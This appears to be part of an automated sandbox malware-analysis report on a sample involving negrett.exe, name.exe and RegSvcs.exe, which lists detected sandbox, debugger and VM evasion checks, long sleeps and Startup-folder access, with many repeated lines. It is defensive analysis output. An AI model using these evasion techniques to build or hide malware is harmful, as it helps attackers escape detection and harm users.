Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\negrett.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\directory\name.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Found API chain indicative of sandbox detection

Source: C:\Users\user\AppData\Roaming\negrett.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep
Source: C:\Users\user\AppData\Local\directory\name.exe	Sandbox detection routine: GetForegroundWindow, DecisionNode, Sleep

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

9_2_004019F0

Contains functionality to detect virtual machines (SLDT)

Source: C:\Users\user\AppData\Local\directory\name.exe

Code function: 8_2_01001199 sldt word ptr [ecx]

8_2_01001199

Contains long sleeps (>= 3 min)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 1404	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8402	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 8861	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Window / User API: threadDelayed 961	Jump to behavior

Found evasive API chain (may stop execution after checking a module file name)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Roaming\negrett.exe	API coverage: 6.7 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.5 %
Source: C:\Users\user\AppData\Local\directory\name.exe	API coverage: 4.4 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 1376

Thread sleep time: -240000s >= -30000s

Jump to behavior

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B7DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	5_2_00B7DBBE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B4C2A2 FindFirstFileExW,	5_2_00B4C2A2
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B868EE FindFirstFileW,FindClose,	5_2_00B868EE
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B8698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	5_2_00B8698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	8_2_0105DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0102C2A2 FindFirstFileExW,	8_2_0102C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	8_2_0106698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010668EE FindFirstFileW,FindClose,	8_2_010668EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0105D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	8_2_0105D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0106979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_0106979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	8_2_01069642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01069B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	8_2_01069B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01065C97 FindFirstFileW,FindNextFileW,FindClose,	8_2_01065C97
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	11_2_0139DBBE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0136C2A2 FindFirstFileExW,	11_2_0136C2A2
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	11_2_013A698F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A68EE FindFirstFileW,FindClose,	11_2_013A68EE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D076
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_0139D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	11_2_0139D3A9
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A979D
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	11_2_013A9642
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	11_2_013A9B2B
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013A5C97 FindFirstFileW,FindNextFileW,FindClose,	11_2_013A5C97

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 600000	Jump to behavior

Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\	Jump to behavior
Source: C:\Windows\System32\wscript.exe	File opened: C:\Users\user\	Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

API call chain: ExitProcess graph end node

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 9_2_00410C4B _LocaleUpdate::_LocaleUpdate,__fileno,__isleadbyte_l,LdrInitializeThunk,__cftof,_strlen,__malloc_crt,__decode_pointer,__decode_pointer,__decode_pointer,__aulldvrm,_write_multi_char,_write_string,_write_multi_char,__cftof,_write_string,_write_string,_write_multi_char,

9_2_00410C4B

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B8EAA2 BlockInput,

5_2_00B8EAA2

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

5_2_00B42622

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

9_2_004019F0

Contains functionality to dynamically determine API calls

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B142DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

5_2_00B142DE

Contains functionality to read the PEB

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 2_2_03530715 mov edx, dword ptr fs:[00000030h]	2_2_03530715
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_3_029F40E8 mov eax, dword ptr fs:[00000030h]	5_3_029F40E8
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B34CE8 mov eax, dword ptr fs:[00000030h]	5_2_00B34CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01014CE8 mov eax, dword ptr fs:[00000030h]	8_2_01014CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00193580 mov eax, dword ptr fs:[00000030h]	8_2_00193580
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_001935E0 mov eax, dword ptr fs:[00000030h]	8_2_001935E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_00191ED0 mov eax, dword ptr fs:[00000030h]	8_2_00191ED0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01354CE8 mov eax, dword ptr fs:[00000030h]	11_2_01354CE8
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_005535E0 mov eax, dword ptr fs:[00000030h]	11_2_005535E0
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_00553580 mov eax, dword ptr fs:[00000030h]	11_2_00553580
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_00551ED0 mov eax, dword ptr fs:[00000030h]	11_2_00551ED0

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Roaming\negrett.exe

Code function: 5_2_00B70B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,

5_2_00B70B62

Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B309D5 SetUnhandledExceptionFilter,	5_2_00B309D5
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B42622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B42622
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B3083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	5_2_00B3083F
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: 5_2_00B30C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	5_2_00B30C21
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_010109D5 SetUnhandledExceptionFilter,	8_2_010109D5
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01022622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_01022622
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_0101083F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_0101083F
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 8_2_01010C21 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_01010C21
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_0040CE09
